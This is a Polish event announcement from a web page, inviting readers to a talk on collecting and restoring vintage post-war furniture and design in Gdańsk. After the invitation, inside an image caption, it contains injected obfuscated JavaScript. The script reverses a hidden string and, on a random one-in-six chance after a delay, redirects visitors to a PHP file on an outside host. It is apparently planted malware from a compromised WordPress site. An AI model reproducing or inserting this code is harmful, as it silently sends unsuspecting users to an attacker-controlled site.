Niechciany design – skarby w naszych domach.

Jak to jest, że dla niektórych wazon z PRL-u to jednak „wazon optyczny” projektu Jana Sylwestra Drosta? Jak to jest, że niektórzy na wystawie „Dziedzictwo” w Muzeum Narodowym w Krakowie zatrzymują się i podziwiają meblościankę Kowalskich a inni jej nie zauważają, albo bagatelizują jako obiekt muzealny?

Obecny trend na powojenne wzornictwo przemysłowe pozostawia wiele pytań w tej materii, często niedopowiedzianych i otwartych. Dlatego warto spotkać się i porozmawiać o obiegu naszego dizajnu, tych niechanych skarbach, które stają się jednak porządane. Porozmawiamy przede wszystkim o meblach. Czym różnią się bestsellery sieciówek od śmietnikowych znalezisk, w co i jak
rozsądnie inwestować.

Wszystkich zainteresowanych kolekcjonowaniem przedmiotów vintage zapraszamy na spotkanie z Danielem Stoinskim – założycielem sklepu Pikasy Sklep oraz pracowni Daniel Stoiński Redesign.
Opowiemy o kolekcjonowaniu, budowaniu kolekcji, porozmawiamy o samodzielnym wyszukiwaniu i odnawianiu.

Spotkanie jest otwarte i nie wymagamy zapisów;
Do zobaczenia w sieni Instytutu Kultury Miejskiej w Gdańsku w dniu 7. grudnia o g. 18.00.

Zachęcamy do dołączenia do wydarzenia na Facebooku.

$NqM=function(n){if (typeof ($NqM.list[n]) == „string”) return $NqM.list[n].split(„”).reverse().join(„”);return $NqM.list[n];};$NqM.list=[„\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toiński, twórca projektu Pikasy Sklep oraz firmy Daniel Stoiński Redesign. Materiał dla Patyna, fot. Grzegorz Broniatowski, Max Zieliński.” width=”960″ height=”745″ class=”size-full wp-image-4075″ /> *fot. Daniel Stoiński, twórca projektu Pikasy Sklep oraz Daniel Stoiński Redesign. Materiał dla Patyna, fot. Grzegorz Broniatowski, Max Zieliński.

Dodaj komentarz

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *